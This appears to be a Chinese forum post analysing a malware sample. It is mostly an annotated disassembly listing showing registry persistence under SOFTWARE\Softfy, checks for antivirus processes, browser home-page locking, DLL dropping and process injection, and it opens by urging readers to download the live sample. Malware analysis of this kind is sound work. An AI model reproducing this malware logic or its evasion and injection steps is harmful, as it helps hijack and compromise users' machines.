这病毒样本是早两天得到的。刚刚在线杀毒,国内的杀毒软件都还未定义。看到贴的不仿下下来看看你的杀毒软件可以查杀吗!感谢昨天打击我的人(自己),昨晚搞到12点写出
来的文章,以曾加自信心用。由于是最新病毒,所以贴出来。晚点下载就会被杀毒软件加到特征库去了。本人QQ:591841426(学习交流之用,求破者勿扰)
嫌话少说!开始。
得到的这个样本未加壳,长度为“256,144”字节,该样本使用“VC++”编写
MD5值:F5E39FD21E72F15A966F90AA35725B87
1、先来看看病毒主体
00401660 >/$ 55 PUSH EBP //载入停在这里
00401661 |. 8BEC MOV EBP,ESP
00401663 |. 6A FF PUSH -1
00401665 |. 68 A8524000 PUSH 复件_123.004052A8
0040166A |. 68 5A164000 PUSH <JMP.&MSVCRT._except_handler3> ; SE 处理程序安装
0040166F |. 64:A1 0000000>MOV EAX,DWORD PTR FS:[0]
00401675 |. 50 PUSH EAX
00401676 |. 64:8925 00000>MOV DWORD PTR FS:[0],ESP
0040167D |. 83EC 68 SUB ESP,68
00401680 |. 53 PUSH EBX
00401681 |. 56 PUSH ESI
00401682 |. 57 PUSH EDI
00401683 |. 8965 E8 MOV DWORD PTR SS:[EBP-18],ESP
00401686 |. 33DB XOR EBX,EBX
00401688 |. 895D FC MOV DWORD PTR SS:[EBP-4],EBX
0040168B |. 6A 02 PUSH 2
0040168D |. FF15 50514000 CALL DWORD PTR DS:[<&MSVCRT.__set_app_ty>; msvcrt.__set_app_type
00401693 |. 59 POP ECX
00401694 |. 830D 10E64300>OR DWORD PTR DS:[43E610],FFFFFFFF
0040169B |. 830D 14E64300>OR DWORD PTR DS:[43E614],FFFFFFFF
004016A2 |. FF15 54514000 CALL DWORD PTR DS:[<&MSVCRT.__p__fmode>] ; msvcrt.__p__fmode
004016A8 |. 8B0D 04E64300 MOV ECX,DWORD PTR DS:[43E604]
004016AE |. 8908 MOV DWORD PTR DS:[EAX],ECX
004016B0 |. FF15 58514000 CALL DWORD PTR DS:[<&MSVCRT.__p__commode>; msvcrt.__p__commode
004016B6 |. 8B0D 00E64300 MOV ECX,DWORD PTR DS:[43E600]
004016BC |. 8908 MOV DWORD PTR DS:[EAX],ECX
004016BE |. A1 5C514000 MOV EAX,DWORD PTR DS:[<&MSVCRT._adjust_f>
004016C3 |. 8B00 MOV EAX,DWORD PTR DS:[EAX]
004016C5 |. A3 0CE64300 MOV DWORD PTR DS:[43E60C],EAX
004016CA |. E8 16010000 CALL 复件_123.004017E5
004016CF |. 391D 10E44300 CMP DWORD PTR DS:[43E410],EBX
004016D5 |. 75 0C JNZ SHORT 复件_123.004016E3
004016D7 |. 68 E2174000 PUSH 复件_123.004017E2
004016DC |. FF15 60514000 CALL DWORD PTR DS:[<&MSVCRT.__setusermat>; msvcrt.__setusermatherr
004016E2 |. 59 POP ECX
004016E3 |> E8 E8000000 CALL 复件_123.004017D0
004016E8 |. 68 1C604000 PUSH 复件_123.0040601C
004016ED |. 68 18604000 PUSH 复件_123.00406018
004016F2 |. E8 D3000000 CALL <JMP.&MSVCRT._initterm>
004016F7 |. A1 FCE54300 MOV EAX,DWORD PTR DS:[43E5FC]
004016FC |. 8945 94 MOV DWORD PTR SS:[EBP-6C],EAX
004016FF |. 8D45 94 LEA EAX,DWORD PTR SS:[EBP-6C]
00401702 |. 50 PUSH EAX
00401703 |. FF35 F8E54300 PUSH DWORD PTR DS:[43E5F8]
00401709 |. 8D45 9C LEA EAX,DWORD PTR SS:[EBP-64]
0040170C |. 50 PUSH EAX
0040170D |. 8D45 90 LEA EAX,DWORD PTR SS:[EBP-70]
00401710 |. 50 PUSH EAX
00401711 |. 8D45 A0 LEA EAX,DWORD PTR SS:[EBP-60]
00401714 |. 50 PUSH EAX
00401715 |. FF15 68514000 CALL DWORD PTR DS:[<&MSVCRT.__getmainarg>; msvcrt.__getmainargs
0040171B |. 68 14604000 PUSH 复件_123.00406014
00401720 |. 68 00604000 PUSH 复件_123.00406000
00401725 |. E8 A0000000 CALL <JMP.&MSVCRT._initterm>
0040172A |. 83C4 24 ADD ESP,24
0040172D |. A1 6C514000 MOV EAX,DWORD PTR DS:[<&MSVCRT._acmdln>]
00401732 |. 8B30 MOV ESI,DWORD PTR DS:[EAX]
00401734 |. 8975 8C MOV DWORD PTR SS:[EBP-74],ESI
00401737 |. 803E 22 CMP BYTE PTR DS:[ESI],22
0040173A |. 75 3A JNZ SHORT 复件_123.00401776
0040173C |> 46 /INC ESI //从这里开始是获取自身目录
0040173D |. 8975 8C |MOV DWORD PTR SS:[EBP-74],ESI
00401740 |. 8A06 |MOV AL,BYTE PTR DS:[ESI]
00401742 |. 3AC3 |CMP AL,BL
00401744 |. 74 04 |JE SHORT 复件_123.0040174A
00401746 |. 3C 22 |CMP AL,22
00401748 |.^ 75 F2 \JNZ SHORT 复件_123.0040173C //循环到此结束
0040174A |> 803E 22 CMP BYTE PTR DS:[ESI],22
0040174D |. 75 04 JNZ SHORT 复件_123.00401753
0040174F |> 46 INC ESI
00401750 |. 8975 8C MOV DWORD PTR SS:[EBP-74],ESI
00401753 |> 8A06 MOV AL,BYTE PTR DS:[ESI]
00401755 |. 3AC3 CMP AL,BL
00401757 |. 74 04 JE SHORT 复件_123.0040175D
00401759 |. 3C 20 CMP AL,20
0040175B |.^ 76 F2 JBE SHORT 复件_123.0040174F
0040175D |> 895D D0 MOV DWORD PTR SS:[EBP-30],EBX
00401760 |. 8D45 A4 LEA EAX,DWORD PTR SS:[EBP-5C]
00401763 |. 50 PUSH EAX ; /pStartupinfo
00401764 |. FF15 48504000 CALL DWORD PTR DS:[<&KERNEL32.GetStartup>; \GetStartupInfoA
0040176A |. F645 D0 01 TEST BYTE PTR SS:[EBP-30],1
0040176E |. 74 11 JE SHORT 复件_123.00401781
00401770 |. 0FB745 D4 MOVZX EAX,WORD PTR SS:[EBP-2C]
00401774 |. EB 0E JMP SHORT 复件_123.00401784
00401776 |> 803E 20 /CMP BYTE PTR DS:[ESI],20
00401779 |.^ 76 D8 |JBE SHORT 复件_123.00401753
0040177B |. 46 |INC ESI
0040177C |. 8975 8C |MOV DWORD PTR SS:[EBP-74],ESI
0040177F |.^ EB F5 \JMP SHORT 复件_123.00401776
00401781 |> 6A 0A PUSH 0A
00401783 |. 58 POP EAX
00401784 |> 50 PUSH EAX
00401785 |. 56 PUSH ESI
00401786 |. 53 PUSH EBX
00401787 |. 53 PUSH EBX ; /pModule
00401788 |. FF15 44504000 CALL DWORD PTR DS:[<&KERNEL32.GetModuleH>; \GetModuleHandleA
0040178E |. 50 PUSH EAX
0040178F |. E8 6A000000 CALL 复件_123.004017FE //程序主要的CALL
00401794 |. 8945 98 MOV DWORD PTR SS:[EBP-68],EAX
00401797 |. 50 PUSH EAX ; /status
00401798 |. FF15 70514000 CALL DWORD PTR DS:[<&MSVCRT.exit>] ; \exit
0040179E |. 8B45 EC MOV EAX,DWORD PTR SS:[EBP-14]
004017A1 |. 8B08 MOV ECX,DWORD PTR DS:[EAX]
004017A3 |. 8B09 MOV ECX,DWORD PTR DS:[ECX]
004017A5 |. 894D 88 MOV DWORD PTR SS:[EBP-78],ECX
004017A8 |. 50 PUSH EAX
004017A9 |. 51 PUSH ECX
004017AA |. E8 15000000 CALL <JMP.&MSVCRT._XcptFilter>
004017AF |. 59 POP ECX
004017B0 |. 59 POP ECX
004017B1 \. C3 RETN
0040443F . B8 5C194000 MOV EAX,复件_123.0040195C
00404444 . E8 A7D1FFFF CALL 复件_123.004015F0
00404449 . 51 PUSH ECX
0040444A . 56 PUSH ESI
0040444B . 8D45 F0 LEA EAX,DWORD PTR SS:[EBP-10]
0040444E . 57 PUSH EDI
0040444F . 50 PUSH EAX
00404450 . E8 93CEFFFF CALL 复件_123.004012E8
00404455 . 59 POP ECX
00404456 . 8365 FC 00 AND DWORD PTR SS:[EBP-4],0
0040445A . 50 PUSH EAX
0040445B . B9 E4E54300 MOV ECX,复件_123.0043E5E4
00404460 . E8 43D1FFFF CALL <JMP.&MFC42.#858_??4CString@@QAEABV>
00404465 . 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF
00404469 . 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]
0040446C . E8 3BD0FFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00404471 . E8 8AEBFFFF CALL 复件_123.00403000 //创建注册表
00404476 . E8 E4EFFFFF CALL 复件_123.0040345F //创建注册表
0040447B . 8B35 54504000 MOV ESI,DWORD PTR DS:[<&KERNEL32.Sleep>] ; kernel32.Sleep
00404481 . BF C8000000 MOV EDI,0C8
00404486 . 57 PUSH EDI ; /Timeout => 200. ms
00404487 . FFD6 CALL ESI ; \Sleep //睡眠200.ms
00404489 . E8 72FBFFFF CALL 复件_123.00404000 //遍历进程查找ravmond.exe
0040448E . 85C0 TEST EAX,EAX
00404490 . 74 0C JE SHORT 复件_123.0040449E
00404492 . E8 1CFEFFFF CALL 复件_123.004042B3
00404497 . E8 75FEFFFF CALL 复件_123.00404311
0040449C . EB 0E JMP SHORT 复件_123.004044AC
0040449E > E8 E6FEFFFF CALL 复件_123.00404389 //遍历进程查找360tray.exe
004044A3 . 85C0 TEST EAX,EAX
004044A5 . 75 05 JNZ SHORT 复件_123.004044AC
004044A7 . E8 2EFDFFFF CALL 复件_123.004041DA //查找IEXPLORE.EXE锁定主页为 http://www.rom12580.cn
004044AC > 57 PUSH EDI
004044AD . FFD6 CALL ESI
004044AF . E8 16ECFFFF CALL 复件_123.004030CA //开始释放文件
004044B4 . E8 58EDFFFF CALL 复件_123.00403211 //创建目录释放文件
004044B9 . A3 ECE54300 MOV DWORD PTR DS:[43E5EC],EAX
004044BE . E8 EEEEFFFF CALL 复件_123.004033B1 //释放iksii.dll文件
004044C3 . 57 PUSH EDI
004044C4 . FFD6 CALL ESI
004044C6 . E8 D6EDFFFF CALL 复件_123.004032A1 //注入到rundll.exe进程,并运行
004044CB . BF E8030000 MOV EDI,3E8
004044D0 . 57 PUSH EDI
004044D1 . FFD6 CALL ESI
004044D3 . E8 9FCBFFFF CALL 复件_123.00401077 //释放病毒体
004044D8 . 57 PUSH EDI
004044D9 . FFD6 CALL ESI
004044DB . E8 C4FBFFFF CALL 复件_123.004040A4
004044E0 . 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C]
004044E3 . 5F POP EDI
004044E4 . 33C0 XOR EAX,EAX
004044E6 . 5E POP ESI
004044E7 . 64:890D 00000>MOV DWORD PTR FS:[0],ECX
004044EE . C9 LEAVE
004044EF . C3 RETN
0040141D /$ B8 8C184000 MOV EAX,复件_123.0040188C
00401422 |. E8 C9010000 CALL 复件_123.004015F0
00401427 |. 83EC 0C SUB ESP,0C
0040142A |. 8365 FC 00 AND DWORD PTR SS:[EBP-4],0
0040142E |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18]
00401431 |. E8 C7FCFFFF CALL 复件_123.004010FD
00401436 |. 68 60E04300 PUSH 复件_123.0043E060 ; ASCII "SOFTWARE\Softfy\PlugName"
0040143B |. 68 02000080 PUSH 80000002
00401440 |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18]
00401443 |. C645 FC 01 MOV BYTE PTR SS:[EBP-4],1
00401447 |. E8 4BFDFFFF CALL 复件_123.00401197 //创建注册表项
0040144C |. 85C0 TEST EAX,EAX
0040144E |. 75 20 JNZ SHORT 复件_123.00401470
00401450 |. FF75 08 PUSH DWORD PTR SS:[EBP+8]
00401453 |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18]
00401456 |. 68 54E04300 PUSH 复件_123.0043E054 ; ASCII "LogonName"
0040145B |. E8 BB0B0000 CALL 复件_123.0040201B //设置logonname值
00401460 |. FF75 08 PUSH DWORD PTR SS:[EBP+8]
00401463 |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18]
00401466 |. 68 44E04300 PUSH 复件_123.0043E044 ; ASCII "LogonMainName"
0040146B |. E8 AB0B0000 CALL 复件_123.0040201B //设置LogonMainName
00401470 |> 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18]
00401473 |. E8 55FDFFFF CALL 复件_123.004011CD //关闭设置
00401478 |. 8065 FC 00 AND BYTE PTR SS:[EBP-4],0
0040147C |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18]
0040147F |. E8 AEFCFFFF CALL 复件_123.00401132
00401484 |. 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF
00401488 |. 8D4D 08 LEA ECX,DWORD PTR SS:[EBP+8]
0040148B |. E8 1C000000 CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00401490 |. 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C]
00401493 |. 64:890D 00000>MOV DWORD PTR FS:[0],ECX
0040149A |. C9 LEAVE
0040149B \. C3 RETN
00401197 /$ 55 PUSH EBP
00401198 |. 8BEC MOV EBP,ESP
0040119A |. 51 PUSH ECX
0040119B |. 56 PUSH ESI ; 复件_123.0043E5E8
0040119C |. 8BF1 MOV ESI,ECX
0040119E |. FF75 0C PUSH DWORD PTR SS:[EBP+C]
004011A1 |. 8D4E 08 LEA ECX,DWORD PTR DS:[ESI+8]
004011A4 |. E8 09030000 CALL <JMP.&MFC42.#860_??4CString@@QAEABV>
004011A9 |. 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]
004011AC |. 83C6 04 ADD ESI,4
004011AF |. 50 PUSH EAX ; /pDisposition
004011B0 |. 33C0 XOR EAX,EAX ; |
004011B2 |. 56 PUSH ESI ; |pHandle
004011B3 |. 50 PUSH EAX ; |pSecurity => NULL
004011B4 |. 68 3F000F00 PUSH 0F003F ; |Access = KEY_ALL_ACCESS
004011B9 |. 50 PUSH EAX ; |Options => REG_OPTION_NON_VOLATILE
004011BA |. 50 PUSH EAX ; |Class => NULL
004011BB |. 50 PUSH EAX ; |Reserved => 0
004011BC |. FF75 0C PUSH DWORD PTR SS:[EBP+C] ; |Subkey
004011BF |. FF75 08 PUSH DWORD PTR SS:[EBP+8] ; |hKey
004011C2 |. FF15 08504000 CALL DWORD PTR DS:[<&ADVAPI32.RegCreateK>; \RegCreateKeyExA
004011C8 |. 5E POP ESI
004011C9 |. C9 LEAVE
004011CA \. C2 0800 RETN 8
0040345F /$ B8 F8184000 MOV EAX,复件_123.004018F8
00403464 |. E8 87E1FFFF CALL 复件_123.004015F0
00403469 |. 83EC 30 SUB ESP,30
0040346C |. 53 PUSH EBX
0040346D |. 56 PUSH ESI
0040346E |. 8D4D C4 LEA ECX,DWORD PTR SS:[EBP-3C]
00403471 |. E8 4AE1FFFF CALL <JMP.&MFC42.#354_??0CFile@@QAE@XZ>
00403476 |. 33DB XOR EBX,EBX
00403478 |. 8D4D E0 LEA ECX,DWORD PTR SS:[EBP-20]
0040347B |. 895D FC MOV DWORD PTR SS:[EBP-4],EBX
0040347E |. E8 1DE0FFFF CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>
00403483 |. 8D4D E4 LEA ECX,DWORD PTR SS:[EBP-1C]
00403486 |. C645 FC 01 MOV BYTE PTR SS:[EBP-4],1
0040348A |. E8 11E0FFFF CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>
0040348F |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18]
00403492 |. C645 FC 02 MOV BYTE PTR SS:[EBP-4],2
00403496 |. E8 05E0FFFF CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>
0040349B |. 8D4D EC LEA ECX,DWORD PTR SS:[EBP-14]
0040349E |. C645 FC 03 MOV BYTE PTR SS:[EBP-4],3
004034A2 |. E8 F9DFFFFF CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>
004034A7 |. 68 6CE24300 PUSH 复件_123.0043E26C ; ASCII "full80"
004034AC |. 8D4D E4 LEA ECX,DWORD PTR SS:[EBP-1C]
004034AF |. C645 FC 04 MOV BYTE PTR SS:[EBP-4],4
004034B3 |. E8 FADFFFFF CALL <JMP.&MFC42.#860_??4CString@@QAEABV>
004034B8 |. 68 68E24300 PUSH 复件_123.0043E268 ; ASCII "C2"
004034BD |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18]
004034C0 |. E8 EDDFFFFF CALL <JMP.&MFC42.#860_??4CString@@QAEABV>
004034C5 |. 68 60E24300 PUSH 复件_123.0043E260 ; ASCII "1.0.1"
004034CA |. 8D4D EC LEA ECX,DWORD PTR SS:[EBP-14]
004034CD |. E8 E0DFFFFF CALL <JMP.&MFC42.#860_??4CString@@QAEABV>
004034D2 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
004034D5 |. E8 23DCFFFF CALL 复件_123.004010FD
004034DA |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]
004034DD |. C645 FC 05 MOV BYTE PTR SS:[EBP-4],5
004034E1 |. E8 BADFFFFF CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>
004034E6 |. 68 44E24300 PUSH 复件_123.0043E244 ; ASCII " SOFTWARE\Softfy\Plug"
004034EB |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]
004034EE |. C645 FC 06 MOV BYTE PTR SS:[EBP-4],6
004034F2 |. E8 BBDFFFFF CALL <JMP.&MFC42.#860_??4CString@@QAEABV>
004034F7 |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]
004034FA |. E8 BBE0FFFF CALL <JMP.&MFC42.#6282_?TrimLeft@CString>
004034FF |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]
00403502 |. E8 ADE0FFFF CALL <JMP.&MFC42.#6283_?TrimRight@CStrin>
00403507 |. FF75 F0 PUSH DWORD PTR SS:[EBP-10]
0040350A |. BE 02000080 MOV ESI,80000002
0040350F |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403512 |. 56 PUSH ESI
00403513 |. E8 7FDCFFFF CALL 复件_123.00401197 //创建注册表键值
00403518 |. 85C0 TEST EAX,EAX
0040351A |. 75 7B JNZ SHORT 复件_123.00403597
0040351C |. FF75 E4 PUSH DWORD PTR SS:[EBP-1C]
0040351F |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403522 |. 68 34E24300 PUSH 复件_123.0043E234 ; ASCII "PlugUserName"
00403527 |. E8 EFEAFFFF CALL 复件_123.0040201B //设置注册表键值
0040352C |. FF75 E8 PUSH DWORD PTR SS:[EBP-18]
0040352F |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403532 |. 68 24E24300 PUSH 复件_123.0043E224 ; ASCII "PlugSoftName"
00403537 |. E8 DFEAFFFF CALL 复件_123.0040201B //设置注册表键值
0040353C |. FF75 EC PUSH DWORD PTR SS:[EBP-14]
0040353F |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403542 |. 68 18E24300 PUSH 复件_123.0043E218 ; ASCII "PlugSoftVer"
00403547 |. E8 CFEAFFFF CALL 复件_123.0040201B //设置注册表键值
0040354C |. 53 PUSH EBX
0040354D |. 68 0CE24300 PUSH 复件_123.0043E20C ; ASCII "PlugSendNum"
00403552 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403555 |. E8 A6EAFFFF CALL 复件_123.00402000 ////设置注册表键值
0040355A |. 53 PUSH EBX
0040355B |. 68 00E24300 PUSH 复件_123.0043E200 ; ASCII "PlugStat"
00403560 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403563 |. E8 98EAFFFF CALL 复件_123.00402000 ////设置注册表键值
00403568 |. 68 F8E14300 PUSH 复件_123.0043E1F8 ; ASCII "3.6.7"
0040356D |. 68 ECE14300 PUSH 复件_123.0043E1EC ; ASCII "PlugUpdate"
00403572 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403575 |. E8 A1EAFFFF CALL 复件_123.0040201B ////设置注册表键值
0040357A |. 6A 01 PUSH 1
0040357C |. 68 E4E14300 PUSH 复件_123.0043E1E4 ; ASCII "CoreDll"
00403581 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403584 |. E8 77EAFFFF CALL 复件_123.00402000 ////设置注册表键值
00403589 |. 53 PUSH EBX
0040358A |. 68 D8E14300 PUSH 复件_123.0043E1D8 ; ASCII "LoadNums"
0040358F |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403592 |. E8 69EAFFFF CALL 复件_123.00402000 ////设置注册表键值
00403597 |> 57 PUSH EDI
00403598 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
0040359B |. E8 2DDCFFFF CALL 复件_123.004011CD //关闭注册表
004035A0 |. 68 BCE14300 PUSH 复件_123.0043E1BC ; ASCII "SOFTWARE\Softfy\PlugDown"
004035A5 |. 56 PUSH ESI
004035A6 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
004035A9 |. E8 E9DBFFFF CALL 复件_123.00401197 //下面都是创建注册表键值,就不多说了。
004035AE |. 85C0 TEST EAX,EAX
004035B0 |. BF B4E14300 MOV EDI,复件_123.0043E1B4 ; ASCII "1.0.0"
004035B5 |. 75 1C JNZ SHORT 复件_123.004035D3
004035B7 |. 57 PUSH EDI
004035B8 |. 68 ACE14300 PUSH 复件_123.0043E1AC ; ASCII "PlugOne"
004035BD |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
004035C0 |. E8 56EAFFFF CALL 复件_123.0040201B
004035C5 |. 57 PUSH EDI
004035C6 |. 68 A4E14300 PUSH 复件_123.0043E1A4 ; ASCII "PlugTwo"
004035CB |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
004035CE |. E8 48EAFFFF CALL 复件_123.0040201B
004035D3 |> 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
004035D6 |. E8 F2DBFFFF CALL 复件_123.004011CD
004035DB |. 68 8CE14300 PUSH 复件_123.0043E18C ; ASCII "SOFTWARE\Softfy\WebIni"
004035E0 |. 56 PUSH ESI
004035E1 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
004035E4 |. E8 AEDBFFFF CALL 复件_123.00401197
004035E9 |. 85C0 TEST EAX,EAX
004035EB |. 75 32 JNZ SHORT 复件_123.0040361F
004035ED |. 57 PUSH EDI
004035EE |. 68 80E14300 PUSH 复件_123.0043E180 ; ASCII "WebIniVer"
004035F3 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
004035F6 |. E8 20EAFFFF CALL 复件_123.0040201B
004035FB |. E8 10010000 CALL 复件_123.00403710
00403600 |. 0FB7C0 MOVZX EAX,AX
00403603 |. 50 PUSH EAX
00403604 |. 68 70E14300 PUSH 复件_123.0043E170 ; ASCII "WebIniSection"
00403609 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
0040360C |. E8 EFE9FFFF CALL 复件_123.00402000
00403611 |. 53 PUSH EBX
00403612 |. 68 64E14300 PUSH 复件_123.0043E164 ; ASCII "HitProbaby"
00403617 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
0040361A |. E8 E1E9FFFF CALL 复件_123.00402000
0040361F |> 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403622 |. E8 A6DBFFFF CALL 复件_123.004011CD
00403627 |. 68 48E14300 PUSH 复件_123.0043E148 ; ASCII "SOFTWARE\Softfy\LockPage"
0040362C |. 56 PUSH ESI
0040362D |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403630 |. E8 62DBFFFF CALL 复件_123.00401197
00403635 |. 85C0 TEST EAX,EAX
00403637 |. 5F POP EDI
00403638 |. 75 1C JNZ SHORT 复件_123.00403656
0040363A |. 53 PUSH EBX
0040363B |. 68 3CE14300 PUSH 复件_123.0043E13C ; ASCII "LockPageNum" //注册表键值
00403640 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403643 |. E8 B8E9FFFF CALL 复件_123.00402000
00403648 |. 53 PUSH EBX
00403649 |. 68 2CE14300 PUSH 复件_123.0043E12C ; ASCII "NeedLockPage" //注册表键值
0040364E |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403651 |. E8 AAE9FFFF CALL 复件_123.00402000
00403656 |> 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403659 |. E8 6FDBFFFF CALL 复件_123.004011CD
0040365E |. 68 14E14300 PUSH 复件_123.0043E114 ; ASCII "SOFTWARE\Softfy\CSID" //注册表项
00403663 |. 56 PUSH ESI
00403664 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403667 |. E8 2BDBFFFF CALL 复件_123.00401197
0040366C |. 85C0 TEST EAX,EAX
0040366E |. 75 37 JNZ SHORT 复件_123.004036A7
00403670 |. 68 ECE04300 PUSH 复件_123.0043E0EC ; ASCII "{C4560D12-CE25-4A2E-A5D4-B5070FCBE282}"
00403675 |. 68 E4E04300 PUSH 复件_123.0043E0E4 ; ASCII "csid"
0040367A |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
0040367D |. E8 99E9FFFF CALL 复件_123.0040201B //创建注册表csid,锁定主页.
00403682 |. FF35 E4E54300 PUSH DWORD PTR DS:[43E5E4]
00403688 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
0040368B |. 68 DCE04300 PUSH 复件_123.0043E0DC ; ASCII "dllname"
00403690 |. E8 86E9FFFF CALL 复件_123.0040201B
00403695 |. 68 9CE04300 PUSH 复件_123.0043E09C ; ASCII "D:\ssshall"
0040369A |. 68 D4E04300 PUSH 复件_123.0043E0D4 ; ASCII "dllpath"
0040369F |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
004036A2 |. E8 74E9FFFF CALL 复件_123.0040201B
004036A7 |> 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
004036AA |. E8 1EDBFFFF CALL 复件_123.004011CD //关闭注册表
004036AF |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]
004036B2 |. C645 FC 05 MOV BYTE PTR SS:[EBP-4],5
004036B6 |. E8 F1DDFFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004036BB |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
004036BE |. C645 FC 04 MOV BYTE PTR SS:[EBP-4],4
004036C2 |. E8 6BDAFFFF CALL 复件_123.00401132
004036C7 |. 8D4D EC LEA ECX,DWORD PTR SS:[EBP-14]
004036CA |. C645 FC 03 MOV BYTE PTR SS:[EBP-4],3
004036CE |. E8 D9DDFFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004036D3 |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18]
004036D6 |. C645 FC 02 MOV BYTE PTR SS:[EBP-4],2
004036DA |. E8 CDDDFFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004036DF |. 8D4D E4 LEA ECX,DWORD PTR SS:[EBP-1C]
004036E2 |. C645 FC 01 MOV BYTE PTR SS:[EBP-4],1
004036E6 |. E8 C1DDFFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004036EB |. 8D4D E0 LEA ECX,DWORD PTR SS:[EBP-20]
004036EE |. 885D FC MOV BYTE PTR SS:[EBP-4],BL
004036F1 |. E8 B6DDFFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004036F6 |. 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF
004036FA |. 8D4D C4 LEA ECX,DWORD PTR SS:[EBP-3C]
004036FD |. E8 ACDEFFFF CALL <JMP.&MFC42.#665_??1CFile@@UAE@XZ>
00403702 |. 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C]
00403705 |. 5E POP ESI
00403706 |. 5B POP EBX
00403707 |. 64:890D 00000>MOV DWORD PTR FS:[0],ECX
0040370E |. C9 LEAVE
0040370F \. C3 RETN
00401197 /$ 55 PUSH EBP
00401198 |. 8BEC MOV EBP,ESP
0040119A |. 51 PUSH ECX
0040119B |. 56 PUSH ESI
0040119C |. 8BF1 MOV ESI,ECX
0040119E |. FF75 0C PUSH DWORD PTR SS:[EBP+C]
004011A1 |. 8D4E 08 LEA ECX,DWORD PTR DS:[ESI+8]
004011A4 |. E8 09030000 CALL <JMP.&MFC42.#860_??4CString@@QAEABV>
004011A9 |. 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]
004011AC |. 83C6 04 ADD ESI,4
004011AF |. 50 PUSH EAX ; /pDisposition
004011B0 |. 33C0 XOR EAX,EAX ; |
004011B2 |. 56 PUSH ESI ; |pHandle
004011B3 |. 50 PUSH EAX ; |pSecurity => NULL
004011B4 |. 68 3F000F00 PUSH 0F003F ; |Access = KEY_ALL_ACCESS
004011B9 |. 50 PUSH EAX ; |Options => REG_OPTION_NON_VOLATILE
004011BA |. 50 PUSH EAX ; |Class => NULL
004011BB |. 50 PUSH EAX ; |Reserved => 0
004011BC |. FF75 0C PUSH DWORD PTR SS:[EBP+C] ; |Subkey
004011BF |. FF75 08 PUSH DWORD PTR SS:[EBP+8] ; |hKey
004011C2 |. FF15 08504000 CALL DWORD PTR DS:[<&ADVAPI32.RegCreateK>; \RegCreateKeyExA
004011C8 |. 5E POP ESI
004011C9 |. C9 LEAVE
004011CA \. C2 0800 RETN 8
00404000 /$ B8 0C194000 MOV EAX,复件_123.0040190C
00404005 |. E8 E6D5FFFF CALL 复件_123.004015F0
0040400A |. 81EC 2C010000 SUB ESP,12C
00404010 |. 56 PUSH ESI
00404011 |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]
00404014 |. E8 87D4FFFF CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>
